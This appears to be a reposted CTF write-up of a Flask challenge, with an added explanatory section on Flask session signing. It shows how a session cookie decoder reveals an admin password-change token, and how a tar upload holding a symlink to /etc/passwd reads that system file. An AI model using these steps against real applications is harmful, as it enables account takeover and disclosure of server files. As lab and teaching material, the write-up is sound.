PythonServer-Flask decode token

A black-box challenge involving Flask, where the token is obtained by decoding the session. Unfortunately I did not take screenshots in time, so only the text remains; this is a rough write-up.

March 7, 2019, 11:18:30

  1. Registering an account shows that a user named admin already exists. After logging in there is an upload page, but it says that only the administrator may upload tar archives.

  2. Entering 'admin' on the change-password page yields admin's session in the response cookie. Decoding it with the Python 3 script below gives the token, with which the password can be changed successfully. Note that the Flask session script produces different results under Python 2 and Python 3, so test it before relying on it. The script is as follows:

     #!/usr/bin/env python3
     # Decode a Flask session cookie without the secret key: the payload is
     # only signed, not encrypted, so the JSON session data can be read directly.
     import sys
     import zlib
     from flask.sessions import session_json_serializer
     from itsdangerous import base64_decode

     def decryption(payload):
         # cookie layout: [.]<payload>.<timestamp>.<signature>
         payload, sig = payload.rsplit(b'.', 1)
         payload, timestamp = payload.rsplit(b'.', 1)

         # a leading '.' means the payload was zlib-compressed before base64 encoding
         decompress = False
         if payload.startswith(b'.'):
             payload = payload[1:]
             decompress = True

         try:
             payload = base64_decode(payload)
         except Exception as e:
             raise Exception('Could not base64 decode the payload because of '
                             'an exception')

         if decompress:
             try:
                 payload = zlib.decompress(payload)
             except Exception as e:
                 raise Exception('Could not zlib decompress the payload before '
                                 'decoding the payload')

         return session_json_serializer.loads(payload)

     if __name__ == '__main__':
         print(decryption(sys.argv[1].encode()))

  3. Build a tar archive that contains a symlink:

     ln -s /etc/passwd 1.jpg
     tar -cf 1.tar 1.jpg

     tar --help
     tar -cf archive.tar foo bar  # Create archive.tar from files foo and bar.
     tar -tvf archive.tar         # List all files in archive.tar verbosely.
     tar -xf archive.tar          # Extract all files from archive.tar.
    
  4. curl xxx/download/1.jpg returns the contents of /etc/passwd, which gives the flag.
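To make the point of step 2 concrete, here is an added, dependency-free example (not the post's script) that decodes a Flask session cookie the same way and also shows the check the server performs before trusting it: the itsdangerous HMAC-SHA1 signature over `payload.timestamp` with the key derived from `secret_key` and the salt `cookie-session`. The secret and the session contents are constructed for the demo; it assumes plain JSON session values (Flask's tagged serializer adds tags only for non-JSON types).

```python
"""Decode a Flask session cookie and, given the secret, verify its signature.
Flask's default cookie session uses itsdangerous: HMAC-SHA1 over payload "." timestamp,
key = HMAC-SHA1(secret, "cookie-session"), base64url without padding; a leading "."
marks a zlib-compressed payload.  (Added example; not the original post's script.)"""
import base64
import hashlib
import hmac
import json
import zlib

SALT = b"cookie-session"  # salt used by flask.sessions.SecureCookieSessionInterface

def b64d(s: bytes) -> bytes:
    return base64.urlsafe_b64decode(s + b"=" * (-len(s) % 4))  # restore stripped "="

def b64e(b: bytes) -> bytes:
    return base64.urlsafe_b64encode(b).rstrip(b"=")

def decode_payload(cookie: bytes) -> dict:
    """Read the session data: no secret needed, the payload is signed, not encrypted."""
    body, _sig = cookie.rsplit(b".", 1)
    payload, _ts = body.rsplit(b".", 1)
    compressed = payload.startswith(b".")
    raw = b64d(payload[1:] if compressed else payload)
    return json.loads(zlib.decompress(raw) if compressed else raw)

def verify(cookie: bytes, secret: bytes) -> bool:
    """What the server does before trusting a cookie: recompute the HMAC with the real key."""
    body, sig = cookie.rsplit(b".", 1)
    key = hmac.new(secret, SALT, hashlib.sha1).digest()
    expected = hmac.new(key, body, hashlib.sha1).digest()
    return hmac.compare_digest(expected, b64d(sig))

def make_cookie(data: dict, secret: bytes, timestamp: int) -> bytes:
    """Build a cookie the way itsdangerous does; used here to construct demo input."""
    raw = json.dumps(data, separators=(",", ":"), sort_keys=True).encode()
    packed = zlib.compress(raw)
    payload = b"." + b64e(packed) if len(packed) < len(raw) - 1 else b64e(raw)
    ts = b64e(timestamp.to_bytes((timestamp.bit_length() + 7) // 8, "big"))
    body = payload + b"." + ts
    key = hmac.new(secret, SALT, hashlib.sha1).digest()
    return body + b"." + b64e(hmac.new(key, body, hashlib.sha1).digest())

if __name__ == "__main__":
    secret = b"constructed-demo-secret"  # stand-in for the app's secret_key
    cookie = make_cookie({"username": "admin"}, secret, 1551928710)
    print(decode_payload(cookie))  # readable without the secret
    print(verify(cookie, secret), verify(cookie, b"wrong-key"))  # True False
```

The takeaway for defenders: anything placed in a Flask session is readable by whoever holds the cookie, so keep tokens and other secrets server-side and rely on the signature (and a strong, private `secret_key`) only for integrity.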

Reposted from blog.csdn.net/u013457794/article/details/88997027